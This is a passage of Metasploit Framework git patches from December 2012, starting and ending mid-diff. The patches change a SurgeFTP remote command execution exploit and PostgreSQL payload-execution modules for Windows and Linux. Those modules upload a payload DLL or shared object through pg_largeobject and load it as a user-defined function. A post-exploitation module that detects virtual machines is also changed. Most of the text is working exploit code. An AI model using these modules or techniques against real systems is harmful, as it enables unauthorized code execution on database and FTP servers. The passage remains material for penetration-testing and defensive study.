+ rescue + end + end + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0', KEY_READ) if key.query_value('Identifier').data.downcase =~ /vmware/ vm = true end @@ -113,6 +149,7 @@ class Metasploit3 < Msf::Post end end end + if vm print_status("This is a VMware Virtual Machine") return "VMWare" From 49248c79d686a5622b6d9327b1e3cf3b4c32a534 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 22:22:58 -0600 Subject: [PATCH 046/154] Oops, didn't mean to keep these lines --- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index daafbdb326..e613dc6b3a 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'}) - print_line(Rex::Text.to_hex_dump(res.body)) if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/ return Exploit::CheckCode::Detected else @@ -63,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts) # Unfortunately we can't use env vars - #cmd = cmd.gsub(/\%TEMP\%\\/, 'C:\\') cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER']) http_send_command("cmd.exe /q /c #{cmd}") end From 20cc2fa38dee42d5f7c5e8284e5da770970081ca Mon Sep 17 00:00:00 2001 From: James Lee Date: Sat, 22 Dec 2012 00:30:09 -0600 Subject: [PATCH 047/154] Make Windows postgres_payload more generic * Adds Exploit::EXE to windows/postgres/postgres_payload. This gives us the ability to use generate_payload_dll() which generates a generic dll that spawns rundll32 and runs the shellcode in that process. This is basically what the linux version accomplishes by compiling the .so on the fly. On major advantage of this is that the resulting DLL will work on pretty much any version of postgres * Adds Exploit::FileDropper to windows version as well. This gives us the ability to delete the dll via the resulting session, which works because the template dll contains code to shove the shellcode into a new rundll32 process and exit, thus leaving the file closed after Postgres calls FreeLibrary. * Adds pre-auth fingerprints for 9.1.5 and 9.1.6 on Ubuntu and 9.2.1 on Windows * Adds a check method to both Windows and Linux versions that simply makes sure that the given credentials work against the target service. * Replaces the version-specific lo_create method with a generic technique that works on both 9.x and 8.x * Fixes a bug when targeting 9.x; "language C" in the UDF creation query gets downcased and subsequently causes postgres to error out before opening the DLL * Cleans up lots of rdoc in Exploit::Postgres --- lib/msf/core/exploit/postgres.rb | 251 ++++++++++++------ .../linux/postgres/postgres_payload.rb | 37 ++- .../windows/postgres/postgres_payload.rb | 138 +++++----- 3 files changed, 254 insertions(+), 172 deletions(-) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index cda562efc0..b7ab207e52 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -13,10 +13,13 @@ module Exploit::Remote::Postgres require 'postgres_msf' require 'base64' include Msf::Db::PostgresPR + + # @!attribute [rw] postgres_conn + # @return [::Msf::Db::PostgresPR::Connection] attr_accessor :postgres_conn # - # Creates an instance of a MSSQL exploit module. + # Creates an instance of a PostgreSQL exploit module. # def initialize(info = {}) super @@ -38,27 +41,66 @@ module Exploit::Remote::Postgres register_autofilter_services(%W{ postgres }) end - # postgres_login takes a number of arguments (defaults to the datastore for - # appropriate values), and will either populate self.postgres_conn and return - # :connected, or will return :error, :error_databse, or :error_credentials - # Fun fact: if you get :error_database, it means your username and password - # was accepted (you just failed to guess a correct running database instance). - # Note that postgres_login will first trigger postgres_logout if the module - # is already connected. - def postgres_login(args={}) + # @!group Datastore accessors + + # Return the datastore value of the same name + # @return [String] IP address of the target + def rhost; datastore['RHOST']; end + # Return the datastore value of the same name + # @return [Fixnum] TCP port where the target service is running + def rport; datastore['RPORT']; end + # Return the datastore value of the same name + # @return [String] Username for authentication + def username; datastore['USERNAME']; end + # Return the datastore value of the same name + # @return [String] Password for authentication + def password; datastore['PASSWORD']; end + # Return the datastore value of the same name + # @return [String] Database to connect to when authenticating + def database; datastore['DATABASE']; end + # Return the datastore value of the same name + # @return [Boolean] Whether to print verbose output + def verbose; datastore['VERBOSE']; end + + # @!endgroup + + # Takes a number of arguments (defaults to the datastore for appropriate + # values), and will either populate {#postgres_conn} and return + # +:connected+, or will return +:error+, +:error_databse+, or + # +:error_credentials+ in case of an error. + # + # Fun fact: if you get +:error_database+, it means your username and + # password was accepted (you just failed to guess a correct running database + # instance). + # + # @note This method will first call {#postgres_logout} if the module is + # already connected. + # + # @param opts [Hash] Options for authenticating + # @option opts [String] :database The database + # @option opts [String] :username The username + # @option opts [String] :username The username + # @option opts [String] :server IP address or hostname of the target server + # @option opts [Fixnum] :port TCP port on :server + # + # @return [:error_database] if user/pass are correct but database is wrong + # @return [:error_credentials] if user/pass are wrong + # @return [:error] if some other error occurred + # @return [:connected] if everything went as planned + def postgres_login(opts={}) postgres_logout if self.postgres_conn - db = args[:database] || datastore['DATABASE'] - username = args[:username] || datastore['USERNAME'] - password = args[:password] || datastore['PASSWORD'] - ip = args[:server] || datastore['RHOST'] - port = args[:port] || datastore['RPORT'] + db = opts[:database] || datastore['DATABASE'] + username = opts[:username] || datastore['USERNAME'] + password = opts[:password] || datastore['PASSWORD'] + ip = opts[:server] || datastore['RHOST'] + port = opts[:port] || datastore['RPORT'] uri = "tcp://#{ip}:#{port}" if Rex::Socket.is_ipv6?(ip) uri = "tcp://[#{ip}]:#{port}" end - verbose = args[:verbose] || datastore['VERBOSE'] + verbose = opts[:verbose] || datastore['VERBOSE'] begin self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e @@ -80,7 +122,9 @@ module Exploit::Remote::Postgres end end - # Logs out of a database instance. + # Logs out of a database instance and sets {#postgres_conn} to nil + # + # @return [void] def postgres_logout ip = datastore['RHOST'] port = datastore['RPORT'] @@ -92,9 +136,13 @@ module Exploit::Remote::Postgres print_status "#{ip}:#{port} Postgres - Disconnected" if verbose end - # If not currently connected, postgres_query will attempt to connect. If an + # If not currently connected, attempt to connect. If an # error is encountered while executing the query, it will return with # :error ; otherwise, it will return with :complete. + # + # @param sql [String] The query to run + # @param doprint [Boolean] Whether the result should be printed + # @return [Hash] def postgres_query(sql=nil,doprint=false) ip = datastore['RHOST'] port = datastore['RPORT'] @@ -104,7 +152,7 @@ module Exploit::Remote::Postgres end if self.postgres_conn sql ||= datastore['SQL'] - print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE'] + vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'" begin resp = self.postgres_conn.query(sql) rescue RuntimeError => e @@ -151,15 +199,21 @@ module Exploit::Remote::Postgres return :complete end - # postgres_fingerprint attempts to fingerprint a remote Postgresql instance, - # inferring version number from the failed authentication messages. + # Attempts to fingerprint a remote PostgreSQL instance, inferring version + # number from the failed authentication messages or simply returning the + # result of "select version()" if authentication was successful. + # + # @return [Hash] A hash containing the version in one of the keys :preauth, + # :auth, or :unkown, depending on how it was determined + # @see #postgres_authed_fingerprint + # @see #analyze_auth_error def postgres_fingerprint(args={}) return postgres_authed_fingerprint if self.postgres_conn db = args[:database] || datastore['DATABASE'] username = args[:username] || datastore['USERNAME'] password = args[:password] || datastore['PASSWORD'] - rhost = args[:server] || datastore['RHOST'] - rport = args[:port] || datastore['RPORT'] + rhost = args[:server] || datastore['RHOST'] + rport = args[:port] || datastore['RPORT'] uri = "tcp://#{rhost}:#{rport}" if Rex::Socket.is_ipv6?(rhost) @@ -176,6 +230,10 @@ module Exploit::Remote::Postgres return postgres_authed_fingerprint if self.postgres_conn end + # Ask the server what its version is + # + # @return (see #postgres_fingerprint) + # @see #postgres_fingerprint def postgres_authed_fingerprint resp = postgres_query("select version()",false) ver = resp[:complete].rows[0][0] @@ -185,6 +243,10 @@ module Exploit::Remote::Postgres # Matches up filename, line number, and routine with a version. # These all come from source builds of Postgres. TODO: check # in on the binary distros, see if they're different. + # + # @param e [RuntimeError] The exception raised by Connection.new + # @return (see #postgres_fingerprint) + # @see #postgres_fingerprint def analyze_auth_error(e) fname,fline,froutine = e.to_s.split("\t")[3,3] fingerprint = "#{fname}:#{fline}:#{froutine}" @@ -223,14 +285,26 @@ module Exploit::Remote::Postgres when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials) when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good) + when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials) + when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials) + + when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database + when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database + when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + # Windows when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials) when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials) when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good) + when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf) when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds) + when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds) + when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials) + when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf) + # OpenSolaris (thanks Alexander!) when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials) @@ -243,6 +317,8 @@ module Exploit::Remote::Postgres end end + # @return [String] The password as provided by the user or a random one if + # none has been given. def postgres_password if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s @@ -252,7 +328,7 @@ module Exploit::Remote::Postgres end # This presumes the user has rights to both the file and to create a table. - # If not, postgre_query() will return an error (usually :sql_error), + # If not, {#postgres_query} will return an error (usually :sql_error), # and it should be dealt with by the caller. def postgres_read_textfile(filename) # Check for temp table creation privs first. @@ -267,6 +343,8 @@ module Exploit::Remote::Postgres return postgres_query(read_query,true) end + # @return [Boolean] Whether the current user has privilege +priv+ on the + # current database def postgres_has_database_privilege(priv) sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')} ret = postgres_query(sql,false) @@ -278,8 +356,9 @@ module Exploit::Remote::Postgres end # Creates the function sys_exec() in the pg_temp schema. + # @deprecated Just get a real shell instead def postgres_create_sys_exec(dll) - q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable" + q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable" resp = postgres_query(q); if resp[:sql_error] print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}" @@ -290,6 +369,8 @@ module Exploit::Remote::Postgres # This presumes the pg_temp.sys_exec() udf has been installed, almost # certainly by postgres_create_sys_exec() + # + # @deprecated Just get a real shell instead def postgres_sys_exec(cmd) print_status "Attempting to Execute: #{cmd}" q = "select pg_temp.sys_exec('#{cmd}')" @@ -302,88 +383,106 @@ module Exploit::Remote::Postgres end - # Takes a local filename and uploads it into a table as a Base64 encoded string. - # Returns an array if successful, false if not. + # Uploads the given local file to the remote server + # + # @param fname [String] Name of a file on the local filesystem to be + # uploaded + # @param remote_fname (see #postgres_upload_binary_data) + # @return (see #postgres_upload_binary_data) def postgres_upload_binary_file(fname, remote_fname=nil) data = File.read(fname) postgres_upload_binary_data(data, remote_fname) end + # Writes data to disk on the target server. + # + # This is accomplished in 5 steps: + # 1. Create a new object with "select lo_create(-1)" + # 2. Delete any resulting rows in pg_largeobject table. + # On 8.x and older, postgres inserts rows as a result of the call to + # lo_create. Deleting them here approximates the state on 9.x where no + # such insert happens. + # 3. Break the data into LOBLOCKSIZE-byte chunks. + # 4. Insert each of the chunks as a row in pg_largeobject + # 5. Select lo_export to write the file to disk + # + # @param data [String] Raw binary to write to disk + # @param remote_fname [String] Name of the file on the remote server where + # the data will be stored. Default is ".dll" + # @return [nil] if any part of this process failed + # @return [String] if everything went as planned, the name of the file we + # dropped. This is really only useful if +remote_fname+ is nil def postgres_upload_binary_data(data, remote_fname=nil) - data = postgres_base64_data(data) - tbl,fld = postgres_create_stager_table - return false unless data && tbl && fld - q = "insert into #{tbl}(#{fld}) values('#{data}')" - resp = postgres_query(q) - if resp[:sql_error] - print_error resp[:sql_error] - return false - end - oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname) - return false unless oid && fout - return [tbl,fld,fout,oid] - end - - # Writes b64 data from a table field, decoded, to disk. - # - # This is accomplished with 3 sql queries: - # 1. select lo_create - # 2. version dependant: - # - on 9.x, insert into pg_largeobject - # - on older versions, update pg_largeobject - # 3. select lo_export to write the file to disk - # - def postgres_write_data_to_disk(tbl,fld,remote_fname=nil) - oid = rand(60000) + 1000 remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll" - ver = postgres_fingerprint - case ver[:auth] - when /PostgreSQL 9\./ - # 9.x does *not* insert the largeobject into the table when you do - # the lo_create, so we must insert it ourselves. - queries = [ - "select lo_create(#{oid})", - "insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')", - "select lo_export(#{oid}, '#{remote_fname}')" - ] - else - # 8.x inserts the largeobject into the table when you do the - # lo_create, so we with a value. - # - # 7.x is an unknown, but this behavior was the default before the - # addition of support for 9.x above, so try it this way and hope - # for the best - queries = [ - "select lo_create(#{oid})", - "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}", - "select lo_export(#{oid}, '#{remote_fname}')" - ] + # From the Postgres documentation: + # SELECT lo_creat(-1); -- returns OID of new, empty large object + # Doing it this way instead of calling lo_create with a random number + # ensures that we don't accidentally hit the id of a real object. + resp = postgres_query "select lo_creat(-1)" + unless resp and resp[:complete] and resp[:complete].rows[0] + print_error "Failed to get a new loid" + return end + oid = resp[:complete].rows[0][0].to_i + + queries = [ "delete from pg_largeobject where loid=#{oid}" ] + + # Break the data into smaller chunks that can fit in the size allowed in + # the pg_largeobject data column. + # From the postgres documentation: + # "The amount of data per page is defined to be LOBLKSIZE (which is + # currently BLCKSZ/4, or typically 2 kB)." + # Empirically, it seems that 8kB is fine on 9.x, but we play it safe and + # stick to 2kB. + chunks = [] + while ((c = data.slice!(0..2047)) && c.length > 0) + chunks.push c + end + + chunks.each_with_index do |chunk, pageno| + b64_data = postgres_base64_data(chunk) + insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))" + queries.push( "#{insert}"%[oid, pageno, b64_data] ) + end + queries.push "select lo_export(#{oid}, '#{remote_fname}')" + + # Now run each of the queries we just built queries.each do |q| resp = postgres_query(q) if resp && resp[:sql_error] print_error "Could not write the library to disk." print_error resp[:sql_error] - break + # Can't really recover from this, bail + return nil end end - return oid,remote_fname + return remote_fname end - # Base64's a file and returns the data. + # Calls {#postgres_base64_data} with the contents of file +fname+ + # + # @param fname [String] Name of a file on the local system + # @return (see #postgres_base64_data) def postgres_base64_file(fname) data = File.open(fname, "rb") {|f| f.read f.stat.size} postgres_base64_data(data) end + # Converts data to base64 with no newlines + # + # @param data [String] Raw data to be base64'd + # @return [String] A base64 string suitable for passing to postgresql's + # decode(..., 'base64') function def postgres_base64_data(data) [data].pack("m*").gsub(/\r?\n/,"") end # Creates a temporary table to store base64'ed binary data in. + # + # @deprecated No longer necessary since we can insert base64 data directly def postgres_create_stager_table tbl = Rex::Text.rand_text_alpha(8).downcase fld = Rex::Text.rand_text_alpha(8).downcase diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index e28984d5d8..e64feb9b34 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -1,7 +1,3 @@ -### -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # original windows module this is based on ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ] @@ -66,17 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote deregister_options('SQL', 'RETURN_ROWSET') end - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def rhost; datastore['rhost']; end - def rport; datastore['rport']; end - def verbose; datastore['VERBOSE']; end - def bits; datastore['BITS'];end + def check + version = postgres_fingerprint - def execute_command(cmd, opts) - postgres_sys_exec(cmd) + if version[:auth] + return CheckCode::Vulnerable + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end end def exploit @@ -89,28 +82,27 @@ class Metasploit3 < Msf::Exploit::Remote end fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so" - tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname) - unless tbl && fld && so && oid + unless postgres_upload_binary_data(payload_so(fname), fname) print_error "Could not upload the UDF SO" return end - print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})" + print_status "Uploaded as #{fname}, should be cleaned up automatically" begin func_name = Rex::Text.rand_text_alpha(10) postgres_query( "create or replace function pg_temp.#{func_name}()"+ - " returns void as '#{so}','#{func_name}'"+ - " language 'C' strict immutable" + " returns void as '#{fname}','#{func_name}'"+ + " language c strict immutable" ) - rescue + rescue RuntimeError => e + print_error "Failed to create UDF function: #{e.class}: #{e}" end postgres_logout if @postgres_conn end - # Authenticate to the postgres server. # # Returns the version from #postgres_fingerprint @@ -132,6 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote ) return result[:auth] else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") return :noauth end rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 746de7703e..19e722cd08 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,29 +7,29 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres - include Msf::Exploit::CmdStagerVBS + include Msf::Auxiliary::Report + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper # Creates an instance of this module. def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL for Microsoft Windows Payload Execution', 'Description' => %q{ - This module creates and enables a custom UDF (user defined function) on the - target host via the UPDATE pg_largeobject method of binary injection. On - default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres - service account may write to the Windows temp directory, and may source - UDF DLL's from there as well. + On default Microsoft Windows installations of PostgreSQL the postgres + service account may write to the current directory (which is usually + "C:\Program Files\PostgreSQL\\data" where is the + major.minor version of PostgreSQL). UDF DLL's may be sourced from + there as well. - PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are - valid targets for this module. - - NOTE: This module will leave a payload executable on the target system when the - attack is finished, as well as the UDF DLL and the OID. + This module uploads a Windows DLL file via the pg_largeobject method + of binary injection and creates a UDF (user defined function) from + that DLL. Because the payload is run from DllMain, it does not need to + conform to specific Postgres API versions. }, 'Author' => [ @@ -41,18 +37,17 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # this Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ - [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', - 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL - ] + [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', ], + [ 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' ], # A litte more specific to PostgreSQL ], 'Platform' => 'win', 'Targets' => - [ - [ 'Automatic', { } ], # Confirmed on XXX - ], + [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x86_64', { 'Arch' => ARCH_X86_64 } ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper. )) @@ -60,83 +55,78 @@ class Metasploit3 < Msf::Exploit::Remote deregister_options('SQL', 'RETURN_ROWSET') end - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def verbose; datastore['VERBOSE']; end - def rhost; datastore['RHOST']; end - def rport; datastore['RPORT']; end + def check + version = postgres_fingerprint - def execute_command(cmd, opts) - postgres_sys_exec(cmd) + if version[:auth] + print_status "Authentication successful. Version: #{version}" + return CheckCode::Vulnerable + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end end def exploit - version = get_version(username,password,database,verbose) + version = do_login(username,password,database) case version - when :nocompat; print_error "Authentication successful, but not a compatable version." - when :noauth; print_error "Authentication failed." - when :noconn; print_error "Connection failed." + when :noauth; print_error "Authentication failed."; return + when :noconn; print_error "Connection failed."; return + else + print_status("#{rhost}:#{rport} - #{version}") end - return unless version =~ /8\.[234]/ - print_status "Authentication successful and vulnerable version #{version} on Windows confirmed." - tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version)) - unless tbl && fld && dll && oid + + fname = "#{Rex::Text.rand_text_alpha(8)}.dll" + register_files_for_cleanup(fname) + + unless postgres_upload_binary_data(generate_payload_dll, fname) print_error "Could not upload the UDF DLL" return end - print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})" - ret_sys_exec = postgres_create_sys_exec(dll) - if ret_sys_exec - if @postgres_conn - execute_cmdstager({:linemax => 1500, :nodelete => true, :temp=>"."}) - handler - postgres_logout if @postgres_conn - else - print_error "Lost connection." - return - end + + print_status "Uploaded as #{fname}" + begin + func_name = Rex::Text.rand_text_alpha(10) + postgres_query( + "create or replace function pg_temp.#{func_name}()"+ + " returns void as '#{fname}','#{func_name}'"+ + " language c strict immutable" + ) + rescue RuntimeError => e + print_error "Failed to create UDF function: #{e.class}: #{e}" end postgres_logout if @postgres_conn + end - def dll_fname(version) - File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll") - end - - # A shorter version of do_fingerprint from the postgres_version scanner - # module, specifically looking for versions that valid targets for this - # module. - def get_version(user=nil,pass=nil,database=nil,verbose=false) + # Authenticate to the postgres server. + # + # Returns the version from #postgres_fingerprint + def do_login(user=nil,pass=nil,database=nil) begin - msg = "#{rhost}:#{rport} Postgres -" password = pass || postgres_password - vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") + vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") result = postgres_fingerprint( :db => database, :username => user, :password => password ) if result[:auth] - # So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4 - # This also checks to see if it was compiled with a windows-based compiler -- - # the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw) - # Also, the method to write files to disk doesn't appear to work on 9.0, so - # tabling that version for now. - if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i - return $1 - else - print_status "Found #{result[:auth]}" - return :nocompat - end + report_service( + :host => rhost, + :port => rport, + :name => "postgres", + :info => result.values.first + ) + return result[:auth] else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") return :noauth end - rescue Rex::ConnectionError - vprint_error "#{rhost}:#{rport} Connection Error: #{$!}" + rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError return :noconn end end + end From d97a63a94c62ff891f9d540349d9867c590b6774 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 22 Dec 2012 02:35:22 -0600 Subject: [PATCH 048/154] Make changes based on juan and egypt's feedback --- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index e613dc6b3a..b546de063f 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -31,14 +31,10 @@ class Metasploit3 < Msf::Exploit::Remote [ ['EDB', '23522'] ], - 'Payload' => - { - 'DisableNops' => true - }, 'Targets' => [ [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'} ], - [ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix'} ] + [ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ] ], 'DisclosureDate' => 'Dec 06 2012')) @@ -46,8 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(7021), OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]), - OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), - OptString.new('FOLDER', [ true, 'The folder to write to for Windows target', 'C:\\Windows\\Temp\\']) + OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]) ], self.class) end @@ -61,8 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts) - # Unfortunately we can't use env vars - cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER']) http_send_command("cmd.exe /q /c #{cmd}") end From ddb98715776e6d49443d26816cbc9db54b093e81 Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Sat, 22 Dec 2012 10:27:54 -0400 Subject: [PATCH 049/154] refactor for use of registry mixin and will now create a note for the hypervisor --- modules/post/windows/gather/checkvm.rb | 115 ++++++++++++++----------- 1 file changed, 63 insertions(+), 52 deletions(-) diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index c565ffb905..8f7faadf96 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -9,11 +9,13 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' require 'msf/core/post/common' +require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Common + include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, @@ -26,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) @@ -36,30 +37,25 @@ class Metasploit3 < Msf::Post def hypervchk(session) begin vm = false - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) - sfmsvals = key.enum_key + sfmsvals = registry_enumkeys('HKLM\SOFTWARE\Microsoft') if sfmsvals.include?("Hyper-V") vm = true elsif sfmsvals.include?("VirtualMachine") vm = true end - key.close rescue end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System', KEY_READ) - if key.query_value('SystemBiosVersion').data.downcase =~ /vrtual/ + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion').data.downcase =~ /vrtual/ vm = true end - key.close rescue end end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') if srvvals.include?("VRTUAL") vm = true end @@ -68,8 +64,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') if srvvals.include?("VRTUAL") vm = true end @@ -78,8 +73,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') if srvvals.include?("vmicheartbeat") vm = true elsif srvvals.include?("vmicvss") @@ -93,6 +87,12 @@ class Metasploit3 < 